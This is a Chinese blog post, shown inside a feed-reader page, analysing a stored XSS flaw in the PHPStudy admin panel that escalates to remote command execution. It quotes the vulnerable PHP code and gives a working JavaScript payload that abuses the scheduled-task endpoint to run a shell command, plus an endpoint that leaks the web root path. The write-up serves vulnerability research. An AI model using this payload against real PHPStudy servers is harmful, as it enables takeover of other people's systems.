惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

量子位
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
F
Fortinet All Blogs
博客园 - 聂微东
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Hugging Face - Blog
Hugging Face - Blog
V
Visual Studio Blog
小众软件
小众软件
有赞技术团队
有赞技术团队
雷峰网
雷峰网
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
AWS News Blog
AWS News Blog
C
Cisco Blogs
美团技术团队
T
Threat Research - Cisco Blogs
C
CERT Recently Published Vulnerability Notes
人人都是产品经理
人人都是产品经理
宝玉的分享
宝玉的分享
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
酷 壳 – CoolShell
酷 壳 – CoolShell
Stack Overflow Blog
Stack Overflow Blog
W
WeLiveSecurity
D
DataBreaches.Net
博客园 - 司徒正美
Blog — PlanetScale
Blog — PlanetScale
IT之家
IT之家
云风的 BLOG
云风的 BLOG
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Simon Willison's Weblog
Simon Willison's Weblog
Google DeepMind News
Google DeepMind News
T
The Blog of Author Tim Ferriss
Know Your Adversary
Know Your Adversary
NISL@THU
NISL@THU
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
The Cloudflare Blog
Vercel News
Vercel News
月光博客
月光博客
T
Tailwind CSS Blog
H
Help Net Security
aimingoo的专栏
aimingoo的专栏
P
Proofpoint News Feed
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Spread Privacy
Spread Privacy
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Cisco Talos Blog
Cisco Talos Blog
Microsoft Security Blog
Microsoft Security Blog
V
V2EX
WordPress大学
WordPress大学
Cyberwarzone
Cyberwarzone
Recent Announcements
Recent Announcements

Hi, I Am I

[I Am I 年度简报] — 不知终日梦为鱼 初探 ESP32-CAM QQ 聊天记录 MHT 文件转 HTML [I Am I 年度简报] - 草木本无意,荣枯自有时。 Hexo 中实现 Live Photos 支持 写在当下 NKCTF 2024 1z_F0r3ns1c5 Writeup 春秋杯冬季赛 2023 Writeup [I Am I 年度简报] - 2023 某内网渗透内部赛 Writeup 强网拟态 2023 Writeup Github Actions 自动化部署 Hexo 浅析CobaltStrike流量解密 陇剑杯 2023 Writeup CTF线下赛AWDP总结 ISCC 2023 Writeup ISCC 2023 实战题 Writeup CISCN 2023 Writeup 福建闽盾杯网络空间安全大赛 2023 Writeup 天一永安杯宁波市网络安全大赛 2023 Writeup 贵阳大数据及网络安全精英对抗赛 2023 Writeup 红明谷杯 2023 Writeup Confetti 带来有仪式感的鼓励 记一次 JS 逆向密码加密 [I Am I 年度简报] – 2022 PHP 读取 Excel 文件内容并写入数据库 从0开始的 MoeCTF 开发之路 观安杯 2022 Writeup 利用微信服务号实现早安自动化 Cloudflare批量拉黑IP脚本 蓝帽杯 2022 Writeup 为你的网站添加 Do you like me 小组件 ISCC 2022 Writeup CISCN 2022 Writeup ISCC 2022 实战题 Writeup CTF线下赛AWD攻防总结 [I Am I 年度简报] – 2021 记一次 CNVD 通用型漏洞证书挖掘 Google Adsense 收款流程 使用 Digispark 开发板制作 BadUSB 在 Vue 中使用 Axios 获取钉钉群直播回放的 M3U8 地址 Flask 框架学习记录 关于 Ten·API 防火墙的配置 关于最近 关于 Burp Suite 调教这档事 ISCC 2021 Writeup 记一次 CTF 环境和动态独立靶机部署 各大平台图集解析思路 情话总雷同,恨意千万种 HackThisSite Basic Writeup [I Am I 年度简报] - 2020 Kali 设置中文语言和更换镜像源 使用 Python 下载哔哩哔哩视频 PHP使用 CURL 发送网络请求 PHP蓝奏云直链解析源码 从0开始写一个短视频去水印接口 Windows+Ubuntu 双系统之美化 GRUB Windows+Ubuntu 双系统安装 树莓派安装 Aria2 实现24小时不间断的下载机 抖音无水印解析最新PHP源码 API-Admin Ten·API管理后台 树莓派安装 DLNA 实现流媒体服务器 [I Am I 年度简报] - 2019 Hello Hexo Goindex 将 Google Drive 打造成网盘 自用博客评论邮件通知美化模板 使用 IFTTT 长久保留 Google Voice 号码 Telegram MTProxy 代理一键安装脚本 三分钟学会搭建我的世界基岩版服务器 PHP跳转QQ聊天窗口源码 推荐几款开源HTML5(Web)框架 谷歌新出浏览器 Chromium 可以直接翻墙 Live2D!为你的网站添加看板娘 为你的网站添加Gittalk评论 网站数据离奇丢失...... Lsky Pro(兰空图床)—又一款单纯的图床程序 LOL明天解封ヾ(◍°∇°◍)ノ゙ 唔~本站受到DDOS攻击 [I Am I 年度简报] – 2018 死肥宅也要谈恋爱之早安晚安自动化 1024,Hello,world! 宝塔面板 Bt.cn 专业版破解教程 Uptime >>16 years 震惊!坐在家里竟然可以日入百万 免费获取一年的 .ooo 域名 PHP 调用 新浪API 生成短网址 思杰马克丁成 Adobe 中国授权经销商 畅言商业广告上线-去除畅言评论广告 使用网易云音乐官方接口解析VIP音乐 PHP获取QQ昵称和头像API 坦白说查发送人QQ新方法(已失效) 日常水一波 通过微博图片地址溯源上传者 WordPress 评论夜间自动改为必须审核 十步叫你如何无损修复硬盘锁(mbr病毒) [I Am I 年度简报] – 2017 密码破解与心理学 网页屏蔽各种按键的代码分享 网络安全技术专业术语
PHPStudy RCE 分析
2023-02-04 · via Hi, I Am I

本质上是一个存储型 XSS 漏洞。通过 XSS 漏洞可以构造恶意 js 代码,在代码触发时自动发送添加 计划任务 的请求,从而实现 RCE

XSS

我们直接在用户名的地方填写我们的 xss 地址,点击登录即可

image-20230203224347376

然后我们通过正确的账号密码登录进去,发现恶意代码被正常解析了,PHPStudy 在展现 操作日志 时未进行任何过滤,所以我们可以执行任意 Javascript 代码

image-20230203224453498

漏洞代码

account.phg 主要用来获取用户登录状态,登录时调用 login 方法

// com\web\service\app\account.php
// 登录
if($type=='login'){
	$username = post('username');
	$pwd = post('password');
	$verifycode = post('verifycode');
	$res = Account::login($username,$pwd,$verifycode);
	xpexit(json_encode($res));
}

其中 post() 函数经过了 htmlspecialchars 处理

function post($field='',$default=''){
	if(!$field){
		return $_POST;	
	}

	if(!isset($_POST[$field])){
		return $default?$default:false;
	}
	if(is_string($_POST[$field])){
		return htmlspecialchars($_POST[$field]);
	}
	return $_POST[$field];
}

login() 方法中通过 Socket::request 处理了参数,Socket::request 调用了 8090 端口

// com\web\service\app\model\Account.php
// 登录
public static function login($username,$pwd,$verifycode){
    if($username==''){
        return array('code'=>1,'msg'=>'用户名不能为空');	
    }
    if($pwd == ''){
        return array('code'=>1,'msg'=>'密码不能为空');
    }
    if(!sessionStarted()){
        sessionStart();
    }
    if(!isset($_SESSION['code']) || strtolower($verifycode)!=strtolower($_SESSION['code'])){
        return array('code'=>1,'msg'=>'验证码不正确');
    }
    $request = json_encode(array('command'=>'login','data'=>array('username'=>$username,'pwd'=>$pwd)));
    $res = Socket::request($request);
    if(!$res){
        return array('code'=>1,'msg'=>'系统主服务故障,请尝试重启主服务');
    }
    $res = json_decode($res,true);
    if($res['result'] == -1){
        return array('code'=>300,'msg'=>$res['msg']);
    }
    if($res['result'] == 0){
        return array('code'=>1,'msg'=>$res['msg']);
    }

    //token校验
    $_SESSION['this_token'] = $res['token'];
    // $access_token = md5(time()).md5(rand(1,100));
    $access_token = $res['token'];
    $_SESSION['admin'] = array('uid'=>$res['ID'],'username'=>$res['ALIAS'],'access_token'=>$access_token);
    $res = array('code'=>0,'msg'=>'登录成功','data'=>array('access_token'=>$access_token),'agreement'=>$res['AGREEMENT']);
    return $res;
}
// com\web\service\app\lib\socket.php
public static function request($data){
    error_reporting(E_ALL);
    set_time_limit(0);
    $host = "127.0.0.1";
    $port = 8090;
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    //接收套接流的最大超时时间2秒,后面是微秒单位超时时间,设置为零,表示不管它
    socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 2000, "usec" => 0));
        //发送套接流的最大超时时间为6秒
    socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array("sec" => 6, "usec" => 0));
    
    $connection = @socket_connect($socket, $host, $port);
    if(!$connection){
        file_put_contents('socket.log', 'cannot connection '.$host.':'.$port.'  at '.date('Y-m-d H:i:s')."\r\n",8);
        return false;
    }
    $_data = json_decode($data,true);
    isset($_SESSION['this_token']) && $_data['token'] = $_SESSION['this_token'];
    $data = json_encode($_data);

    $data .= '^^^';
    socket_write($socket, $data,strlen($data));
    $res = '';
    while ($buff = socket_read($socket,1024)) {
        $encoding = mb_detect_encoding($buff, array("ASCII",'UTF-8',"GB2312","GBK",'BIG5'));
        if($encoding=='EUC-CN'){
            $buff = iconv('GBK', 'UTF-8', $buff);
        }

        $res .= $buff;
        if(substr($res,-3)=='^^^'){
            socket_close($socket);
            break;
        }
    }

    $res = rtrim($res,'^^^');
    if($res == 'ipdeny'){
        xpexit(json_encode(array('code'=>403,'msg'=>'该IP被禁止访问')));
    }

    //检验token
    if($_data['command'] != 'login'){
        $res_ = json_decode($res,true);
        if(isset($res_['result'])&&$res_['result']==-2){
            distorySession();
            xpexit(json_encode(array('code'=>1001,'msg'=>'您已经在其他地方登录过了,即将退出当前页面')));
        }
    }
    

    return $res;
}

Socket 类中我们看到 socket_write() 写入,然后通过 socket_read() 读取结果

socket_write($socket, $data,strlen($data));
$res = '';
while ($buff = socket_read($socket,1024)) {
    $encoding = mb_detect_encoding($buff, array("ASCII",'UTF-8',"GB2312","GBK",'BIG5'));
    if($encoding=='EUC-CN'){
        $buff = iconv('GBK', 'UTF-8', $buff);
    }

    $res .= $buff;
    if(substr($res,-3)=='^^^'){
        socket_close($socket);
        break;
    }
}

RCE

我们可以通过构造恶意 js 代码来发送新增 计划任务 的请求,从而来实现 RCE

image-20230203224555825

这里我们直接在网站根目录下创建一个 1.txt 文件,同时写入 test 内容,代码如下

var xhr = new XMLHttpRequest();
xhr.open("POST", "/service/app/tasks.php?type=save_shell", true);
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send("title=test&exec_cycle=5&week=1&day=3&hour=1&minute=1&shell=echo test > D:\\xp.cn\\www\wwwroot\\admin\\localhost_80\\1.txt");

关于网站的绝对路径,可以通过以下接口获取,请求头必须添加 X-Requested-With,否则接口会返回 404

/service/app/sites.php?type=site_list

image-20230203231047825

参考链接